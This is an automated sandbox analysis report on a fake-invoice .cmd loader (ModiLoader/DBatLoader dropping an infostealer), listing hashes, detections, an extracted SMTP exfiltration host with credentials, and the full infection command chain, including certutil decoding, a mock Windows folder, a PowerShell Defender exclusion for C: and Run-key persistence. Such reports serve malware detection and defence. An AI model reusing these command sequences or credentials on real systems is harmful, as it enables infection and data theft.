Analysis
max time kernel: 149s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-06-2024 01:18
Static task: static1
Behavioral task: behavioral1
  Sample: invoice_2024-05-6577588494.cmd
  Resource: win7-20240611-en
Behavioral task: behavioral2
  Sample: invoice_2024-05-6577588494.cmd
  Resource: win10v2004-20240611-en
General
Target: invoice_2024-05-6577588494.cmd
Size: 3.5MB
MD5: ba2debbaec427ab4f654bccbe788d836
SHA1: 2d0543aebec81e87cfbf8862060d73c4c7dac196
SHA256: 94513f7783348cf8d403be267ab537ba7f4e02a215f28b90675b853d93b79948
SHA512: d4a0c89b0d749a1deb3b2cf47b235854fe6811c5c3e9826cc1ddf057b8ff19845a8f279cedc47b70f575e616114b4cf850cda359cd18e71efbb07dcc4a808d50
SSDEEP: 49152:GA6PFw42qcCUt5GKGhqK6GgCYUMCJwUzun28HMA:r
Malware Config
Extracted
Protocol: smtp
Host: mail.suryaberkatindonesia.com
Port: 587
Username: [email protected]
Password: suryaber123
Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

Detect packed .NET executables. Mostly AgentTeslaV4. 32 IoCs
Processes:
resource  yara_rule
behavioral2/memory/4748-61-0x000000003DDD0000-0x000000003DE2C000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-63-0x0000000040A10000-0x0000000040A6A000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-69-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-91-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-121-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-119-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-117-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-115-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-111-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-109-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-107-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-105-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-103-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-101-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-97-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-96-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-93-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-89-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-87-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-85-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-84-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-81-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-79-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-78-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-75-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-73-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-71-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-67-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-113-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-99-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-65-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01
behavioral2/memory/4748-64-0x0000000040A10000-0x0000000040A64000-memory.dmp  INDICATOR_EXE_Packed_GEN01

ModiLoader Second Stage 2 IoCs
Processes:
resource  yara_rule
behavioral2/memory/4748-56-0x0000000000400000-0x0000000001400000-memory.dmp  modiloader_stage2
behavioral2/memory/4748-59-0x0000000000400000-0x0000000001400000-memory.dmp  modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

Executes dropped EXE 10 IoCs
Processes:
pid   process
856   alpha.exe
1376  alpha.exe
3148  kn.exe
3736  alpha.exe
868   kn.exe
1608  Audio.pif
1524  alpha.exe
3796  alpha.exe
4564  cmd.pif
4748  rzjnrxpH.pif

Loads dropped DLL 1 IoCs
Processes:
pid   process
4564  cmd.pif

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description      ioc  process
Set value (str)  \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hpxrnjzr = "C:\\Users\\Public\\Hpxrnjzr.url"  Audio.pif
Set value (str)  \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows = "C:\\Users\\Admin\\AppData\\Roaming\\windows\\windows.exe"  rzjnrxpH.pif

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
32    ip-api.com

Suspicious use of SetThreadContext 1 IoCs
Processes:
description                         pid   process    target process
PID 1608 set thread context of 4748  1608  Audio.pif  rzjnrxpH.pif

Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description             flow  ioc
HTTP User-Agent header  21    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  23    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
pid   process
3828  powershell.exe
3828  powershell.exe
4748  rzjnrxpH.pif
4748  rzjnrxpH.pif

Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  3828  powershell.exe
Token: SeDebugPrivilege  4748  rzjnrxpH.pif

Suspicious use of WriteProcessMemory 42 IoCs
Processes:
description                        pid   process    target process   (entries)
PID 2688 wrote to memory of 2580   2688  cmd.exe    extrac32.exe     (2)
PID 2688 wrote to memory of 856    2688  cmd.exe    alpha.exe        (2)
PID 856 wrote to memory of 3436    856   alpha.exe  extrac32.exe     (2)
PID 2688 wrote to memory of 1376   2688  cmd.exe    alpha.exe        (2)
PID 1376 wrote to memory of 3148   1376  alpha.exe  kn.exe           (2)
PID 2688 wrote to memory of 3736   2688  cmd.exe    alpha.exe        (2)
PID 3736 wrote to memory of 868    3736  alpha.exe  kn.exe           (2)
PID 2688 wrote to memory of 1608   2688  cmd.exe    Audio.pif        (3)
PID 2688 wrote to memory of 1524   2688  cmd.exe    alpha.exe        (2)
PID 2688 wrote to memory of 3796   2688  cmd.exe    alpha.exe        (2)
PID 1608 wrote to memory of 4592   1608  Audio.pif  cmd.exe          (3)
PID 1608 wrote to memory of 1604   1608  Audio.pif  cmd.exe          (3)
PID 1608 wrote to memory of 4568   1608  Audio.pif  cmd.exe          (3)
PID 4568 wrote to memory of 4564   4568  cmd.exe    cmd.pif          (2)
PID 4564 wrote to memory of 3828   4564  cmd.pif    powershell.exe   (2)
PID 1608 wrote to memory of 1852   1608  Audio.pif  extrac32.exe     (3)
PID 1608 wrote to memory of 4748   1608  Audio.pif  rzjnrxpH.pif     (5)
Processes
(indentation shows the parent/child relationship; each entry lists the image path, the command line, the PID, and the signatures that fired for that process)

C:\Windows\system32\cmd.exe (PID 2688)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\invoice_2024-05-6577588494.cmd"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\extrac32.exe (PID 2580)
    Command line: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

  C:\Users\Public\alpha.exe (PID 856)
    Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\extrac32.exe (PID 3436)
      Command line: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

  C:\Users\Public\alpha.exe (PID 1376)
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\invoice_2024-05-6577588494.cmd" "C:\\Users\\Public\\Audio.mp4" 9
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Public\kn.exe (PID 3148)
      Command line: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\invoice_2024-05-6577588494.cmd" "C:\\Users\\Public\\Audio.mp4" 9
      - Executes dropped EXE

  C:\Users\Public\alpha.exe (PID 3736)
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Public\kn.exe (PID 868)
      Command line: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
      - Executes dropped EXE

  C:\Users\Public\Libraries\Audio.pif (PID 1608)
    Command line: C:\Users\Public\Libraries\Audio.pif
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe (PID 4592)
      Command line: cmd /c mkdir "\\?\C:\Windows "

    C:\Windows\SysWOW64\cmd.exe (PID 1604)
      Command line: cmd /c mkdir "\\?\C:\Windows \System32"

    C:\Windows\SysWOW64\cmd.exe (PID 4568)
      Command line: cmd /c "C:\\Windows \\System32\\cmd.pif"
      - Suspicious use of WriteProcessMemory

      C:\Windows \System32\cmd.pif (PID 4564)
        Command line: "C:\\Windows \\System32\\cmd.pif"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3828)
          Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\extrac32.exe (PID 1852)
      Command line: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Audio.pif C:\\Users\\Public\\Libraries\\Hpxrnjzr.PIF

    C:\Users\Public\Libraries\rzjnrxpH.pif (PID 4748)
      Command line: C:\Users\Public\Libraries\rzjnrxpH.pif
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  C:\Users\Public\alpha.exe (PID 1524)
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
    - Executes dropped EXE

  C:\Users\Public\alpha.exe (PID 3796)
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S
    - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 2.6MB
MD5: 2f6760ed95e0a93dba8419dc5eabccbf
SHA1: 139239677e8a572c8caef3ce393737557756a172
SHA256: 6f322e181418d95f5a9fc12f9adbc5728b6173ac7b19b7bf8e346bfcce57c8bc
SHA512: 5ad72622de9d5b829a9c974a0b4f9b630ada38bce5d87b2e231f447b544f9da081be28073f844d595e9611d24824e772ff1dc602ec1a576be0105ee406bda81f

Filesize: 1.3MB
MD5: a38702206e839d7a2fed5dbbdf91d689
SHA1: fd6477a5f7e81692ec8b8c245f2681ea5e2f24e5
SHA256: f73eb6fb2423ef07681da6c0a3033faec6e645f23e561d7ede802a7c2c07ea0c
SHA512: c285a1c70f08fe3205855513ef620888d2789f7f59837705948ace71338813db5b122533f7a613dc445319551f464e3937ef4f9408a79e6a88874d88e7b6e2e1

Filesize: 182KB
MD5: 3776012e2ef5a5cae6935853e6ca79b2
SHA1: 4fc81df94baaaa550473ac9d20763cfb786577ff
SHA256: 8e104cc58e62de0eab837ac09b01d30e85f79045cc1803fa2ef4eafbdbd41e8d
SHA512: 38811cb1431e8b7b07113ae54f1531f8992bd0e572d9daa1029cf8692396427285a4c089ffd56422ca0c6b393e9fca0856a5a5cd77062e7e71bf0a670843cfb8

Filesize: 283KB
MD5: 8a2122e8162dbef04694b9c3e0b6cdee
SHA1: f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256: b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512: 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Filesize: 1.6MB
MD5: bd8d9943a9b1def98eb83e0fa48796c2
SHA1: 70e89852f023ab7cde0173eda1208dbb580f1e4f
SHA256: 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA512: 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Filesize: 94KB
MD5: 869640d0a3f838694ab4dfea9e2f544d
SHA1: bdc42b280446ba53624ff23f314aadb861566832
SHA256: 0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA512: 6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Filesize: 110KB
MD5: a50a86252349e4536e72653145bb938f
SHA1: c7602b39d739852321b1b35b9d784fdb005d1689
SHA256: 6c62b515d798303eae096883f66afc0150dcf2f970b4ebfe8465c990294c97ae
SHA512: 3c4f6025588425871466f1267dd6ba1db0e9d5e78bca1ac0375c56b8f39023cc8e41f43efbd8e30a75afc921d176bf8c4d66ae8fe28e4e8081049bac48b9433d